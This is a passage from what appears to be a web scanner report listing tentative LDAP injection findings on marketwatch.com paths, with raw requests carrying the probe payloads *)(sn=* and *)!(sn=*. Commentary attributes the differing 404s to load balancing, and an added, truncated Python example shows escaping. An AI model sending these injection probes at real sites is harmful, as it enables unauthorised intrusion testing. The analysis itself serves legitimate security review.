The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. The two requests resulted in different responses, which may indicate that the input is incorporated into a conjunctive LDAP query in an unsafe manner. Before accepting this, check the captured traffic: both responses are HTTP 404, and the Server and X-Machine headers show that they were served by different backend nodes (Microsoft-IIS/6.0 on SEC-IMAGE1 returning its 1635-byte default error page, versus Microsoft-IIS/7.5 on SBKSIMGWEBP01 returning a 103-byte error page). A difference that tracks the node rather than the payload is consistent with load balancing across mixed IIS versions, so the finding should be re-tested against a single node, with a benign baseline value, before it is treated as LDAP injection.

Request 1

GET /MW5/*)(sn=*/story/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SEC-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:11 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /MW5/*)!(sn=*/story/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:11 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

2.4. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. The two requests resulted in different responses, which may indicate that the input is incorporated into a conjunctive LDAP query in an unsafe manner. Before accepting this, check the captured traffic: both responses are HTTP 404, and the Server and X-Machine headers show that they were served by different backend nodes (Microsoft-IIS/7.5 on SBKSIMGWEBP01 returning a 103-byte error page, versus Microsoft-IIS/6.0 on SB-IMAGE3 returning its 1635-byte default error page). A difference that tracks the node rather than the payload is consistent with load balancing across mixed IIS versions, so the finding should be re-tested against a single node, with a benign baseline value, before it is treated as LDAP injection.

Request 1

GET /MW5/content/*)(sn=*/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:12 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content/*)!(sn=*/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

2.5. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 4. The two requests resulted in different responses, which may indicate that the input is incorporated into a conjunctive LDAP query in an unsafe manner. Before accepting this, check the captured traffic: both responses are HTTP 404, and the Server and X-Machine headers show that they were served by different backend nodes (Microsoft-IIS/7.5 on SBKSIMGWEBP01 returning a 103-byte error page, versus Microsoft-IIS/6.0 on SB-IMAGE1 returning its 1635-byte default error page). A difference that tracks the node rather than the payload is consistent with load balancing across mixed IIS versions, so the finding should be re-tested against a single node, with a benign baseline value, before it is treated as LDAP injection.

Request 1

GET /MW5/content/story/*)(sn=*/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:13 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content/story/*)!(sn=*/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

2.6. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. The two requests resulted in different responses, which may indicate that the input is incorporated into a conjunctive LDAP query in an unsafe manner. Before accepting this, check the captured traffic: both responses are HTTP 404, and the Server and X-Machine headers show that they were served by different backend nodes (Microsoft-IIS/7.5 on SBKSIMGWEBP01 returning a 103-byte error page, versus Microsoft-IIS/6.0 on SB-IMAGE3 returning its 1635-byte default error page). A difference that tracks the node rather than the payload is consistent with load balancing across mixed IIS versions, so the finding should be re-tested against a single node, with a benign baseline value, before it is treated as LDAP injection.

Request 1

GET /MW5/*)(sn=*/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:07 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/*)!(sn=*/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

2.7. http://s.marketwatch.com/public/resources/documents/PixelTracking.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s.marketwatch.com
Path:   /public/resources/documents/PixelTracking.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. The two requests resulted in different responses, which may indicate that the input is incorporated into a conjunctive LDAP query in an unsafe manner. Before accepting this, check the captured traffic: both responses are HTTP 404 error pages from Apache/2.0.58, and the FastDynaPage-ServerInfo header shows they came from different nodes holding error pages of different age (sbkj2kapachep08, generated Sat 05/14/11 00:44:45 EDT, 79968 bytes, versus sbkj2kapachep07, generated Fri 05/13/11 00:47:29 EDT, 89095 bytes). A difference that tracks the node and its cached page rather than the payload is consistent with load balancing, so the finding should be re-tested against a single node, with a benign baseline value, before it is treated as LDAP injection.

Request 1

GET /public/*)(sn=*/documents/PixelTracking.html?site=marketwatch.com&zone=frontpage&cb=604870 HTTP/1.1
Host: s.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep08 - Sat 05/14/11 - 00:44:45 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: text/html; charset=UTF-8
Date: Sat, 14 May 2011 10:16:03 GMT
Connection: close
Content-Length: 79968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<!--
var openHouseMode="false",pDateinSpanish="sábado, 14 de mayo, 2011, 00:44:45 EDT",uP="http://online.wsj.com",mpsection="WSJ_ErrorPage",isDenial="false",pDate="Saturday,&nbsp;May&nbsp;14,&nbsp;2011&nbsp;As of&nbsp;12:44&nbsp;AM&nbsp;EDT",_navText="Error Page",gcLFU="https://commerce.wsj.com/auth/submitlogin",pID="0_0_WP_5000",cdnDomain="http://s.wsj.net",nSP="",parentTabID="HNTAB1",gcDomain="online.wsj.com",isTrial="false",isFree="false",PSSG="header0_0_WP_5000",gcHSP="https://",globalHeaderPageTitle="Error Page",pDateinGMT="Saturday,May 14, 2011 04:44:45 GMT",PSS="0_0_WP_5000",pStl="renovation",gcPH="/pj/PortfolioDisplay.cgi",pDateinPortuguese="Sábado, 14 de Maio, 2011, 00:44:45 EDT";
window.name = "wndMain"
//--></script>
<script type="text/javascript" src="http://sj.wsj.net/djscript/require/j_top/version/20110513185311.js"></script>
<script type="text/javascript" src="/public/page/0_0_W0_1011.html"></script>
<script type="text/javascript">
/* <![CDATA[ */
var jsexec = dj.util.JSExec(dj.context.jsexec);
djPerf.firstMark=((new Date()).getTime());if (typeof gomez == "undefined") { this.gomez = {}; }
/* ]]> */
</script>
<link rel="shortcut icon" href="/favicon.ico" />
<link rel="stylesheet" href="http://sc.wsj.net/djstyle/2/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><link rel="stylesheet" href="http://sc.wsj.net/djstyle/3/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><link rel="stylesheet" href="http://sc.wsj.net/djstyle/4/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><!--[if lt IE 7]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie6/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
<!--[if IE 7]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie7/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
<!--[if IE 8]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie8/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
</head>
<body >
<a name="top"></a><div c
...[SNIP]...

Request 2

GET /public/*)!(sn=*/documents/PixelTracking.html?site=marketwatch.com&zone=frontpage&cb=604870 HTTP/1.1
Host: s.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep07 - Fri 05/13/11 - 00:47:29 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: text/html; charset=UTF-8
Date: Sat, 14 May 2011 10:16:03 GMT
Connection: close
Content-Length: 89095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<!--
var openHouseMode="false",pDateinSpanish="viernes, 13 de mayo, 2011, 00:47:28 EDT",uP="http://online.wsj.com",mpsection="WSJ_ErrorPage",isDenial="false",pDate="Friday,&nbsp;May&nbsp;13,&nbsp;2011&nbsp;As of&nbsp;12:47&nbsp;AM&nbsp;EDT",_navText="Error Page",gcLFU="https://commerce.wsj.com/auth/submitlogin",pID="0_0_WP_5000",cdnDomain="http://s.wsj.net",nSP="",parentTabID="HNTAB1",gcDomain="online.wsj.com",isTrial="false",isFree="false",PSSG="header0_0_WP_5000",gcHSP="https://",globalHeaderPageTitle="Error Page",pDateinGMT="Friday,May 13, 2011 04:47:28 GMT",PSS="0_0_WP_5000",pStl="renovation",gcPH="/pj/PortfolioDisplay.cgi",pDateinPortuguese="Sexta-feira, 13 de Maio, 2011, 00:47:28 EDT";
window.name = "wndMain"
//--></script>
<script type="text/javascript" src="http://sj.wsj.net/djscript/require/j_top/version/20110512230933.js"></script>
<script type="text/javascript" src="/public/page/0_0_W0_1011.html"></script>
<script type="text/javascript">
/* <![CDATA[ */
var jsexec = dj.util.JSExec(dj.context.jsexec);
djPerf.firstMark=((new Date()).getTime());if (typeof gomez == "undefined") { this.gomez = {}; }
/* ]]> */
</script>
<link rel="shortcut icon" href="/favicon.ico" />
<link rel="stylesheet" href="http://sc.wsj.net/djstyle/2/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><link rel="stylesheet" href="http://sc.wsj.net/djstyle/3/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><link rel="stylesheet" href="http://sc.wsj.net/djstyle/4/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><!--[if lt IE 7]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie6/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
<!--[if IE 7]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie7/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
<!--[if IE 8]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie8/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
</head>
<body >
<a name="top"></a><div
...[SNIP]...
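
The two probes used in findings 2.2 to 2.7 are chosen so that one of them (*)(sn=*) keeps a conjunctive filter syntactically valid while adding an assertion, and the other (*)!(sn=*) breaks the filter grammar; a backend that really passes the value into an LDAP filter answers the two differently, whereas a static file server answers both with the same 404. The following added example (not code from the scanned sites or from the report's author) shows both payloads against a hypothetical conjunctive filter, what RFC 4515 escaping does to them, and a small filter parser that makes the structural difference measurable. The filter template, the attribute names and the parser are assumptions for illustration; the report shows no LDAP backend behind these CSS paths.

```python
"""Added example: why the scanner's two LDAP probes differ, and how RFC 4515
escaping neutralises both. Not code from the scanned sites or the report's
author; the filter template below is assumed for illustration."""
import re
from typing import List, Optional, Tuple

# Hypothetical conjunctive filter into which a path segment is interpolated.
TEMPLATE = "(&(uid={value})(objectClass=person))"

# RFC 4515 section 3: these characters must be written as \XX inside an
# assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape an untrusted string for use as an LDAP assertion value."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(value: str) -> str:
    """Plain interpolation, the defect the probes are designed to detect."""
    return TEMPLATE.format(value=value)


def build_filter_safe(value: str) -> str:
    """Same template, value escaped first."""
    return TEMPLATE.format(value=escape_filter_value(value))


# Attribute description followed by a comparison operator, e.g. "uid=".
_ITEM = re.compile(r"[A-Za-z][A-Za-z0-9.;-]*(=|~=|>=|<=)")

Node = Tuple[str, object]


class FilterParser:
    """Minimal recursive-descent parser for the RFC 4515 subset used here:
    (&...), (|...), (!...) and simple (attr=value) items. Any structural
    damage, such as a bare '!' between two items, raises ValueError."""

    def __init__(self, text: str) -> None:
        self.s = text
        self.i = 0

    def parse(self) -> Node:
        node = self._filter()
        if self.i != len(self.s):
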